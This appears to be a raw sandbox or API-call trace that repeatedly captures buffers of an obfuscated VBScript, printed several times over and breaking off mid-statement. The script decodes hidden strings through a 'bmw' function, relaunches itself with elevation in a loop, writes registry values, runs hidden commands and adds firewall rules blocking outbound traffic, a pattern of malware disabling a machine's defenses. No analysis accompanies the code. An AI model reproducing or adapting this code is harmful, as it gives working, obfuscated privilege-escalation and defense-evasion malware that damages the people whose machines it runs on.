CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0223.018] wcsncmp (_String1="))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0223.018] wcsncmp (_String1=")\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0223.018] wcsncmp (_String1="\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0223.018] wcsncmp (_String1="\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0223.018] wcsncmp (_String1="newRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), 